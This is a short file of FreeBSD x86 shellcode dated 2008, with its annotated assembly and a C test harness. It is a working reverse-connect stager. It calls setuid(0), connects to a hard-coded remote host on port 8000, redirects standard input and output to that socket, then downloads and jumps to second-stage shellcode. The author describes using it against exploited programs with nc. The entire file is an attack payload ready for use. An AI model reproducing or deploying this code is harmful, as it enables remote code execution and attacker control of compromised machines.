/* ; sm4x - 2008 ; reverse connect dl(shellcode) and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ;) ; - feed it with a $nc -vvl -p8000 <shellcode_in_file ; setuid(0); socket(); connect(); dups(); recv(); jmp; exit(); ; 90 bytes (NULL free dep on remote address) ; FreeBSD 7.0-RELEASE global _start _start: xor eax, eax ; --- setuid(0) push eax push eax mov al, 0x17 push eax int 0x80 ; --- socket() push eax push byte 0x01 push byte 0x02 mov al, 0x61 push eax int 0x80 mov edx, eax ; --- sockaddr_in setup push 0x90011ac ; host (.0. is a NULL) push 0x401f02AA ; port 8000 mov eax, esp ; --- setup connect(edx, eax, 0x10); push byte 0x10 push eax push edx xor eax, eax mov al, 0x62 push eax int 0x80 jne done ; --- dup2(0+1+2) - remove if you dont want results sent over the wire mov cl, 0x03 xor ebx, ebx dups: push ebx push edx mov al, 0x5a push eax int 0x80 inc ebx loop dups ; --- recv(fd, *buf, 1028); xor eax, eax push word 0x0404 ; conf read size here lea ecx, [esp-0x0404] ; and here push ecx push edx mov al, 0x03 push eax int 0x80 ; --- jmp to recv shellcode jmp ecx ; run shellcode done: ; --- exit (optional -> pls exit from jmp shellcode) xor eax, eax inc eax push eax push eax int 0x80 */ #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> char code[] = "\x31\xc0\x50\x50\xb0\x17\x50\xcd\x80\x50" "\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89" "\xc2\x68\xac\x11\x00\x09\x68\xaa\x02\x1f" "\x40\x89\xe0\x6a\x10\x50\x52\x31\xc0\xb0" "\x62\x50\xcd\x80\x75\x24\xb1\x03\x31\xdb" "\x53\x52\xb0\x5a\x50\xcd\x80\x43\xe2\xf6" "\x31\xc0\x66\x68\x04\x04\x8d\x8c\x24\xfc" "\xfb\xff\xff\x51\x52\xb0\x03\x50\xcd\x80" "\xff\xe1\x31\xc0\x40\x50\x50\xcd\x80"; int main(int argc, char **argv) { int (*func)(); printf("Bytes: %d\n", sizeof(code)); func = (int (*)()) code; (int)(*func)(); }
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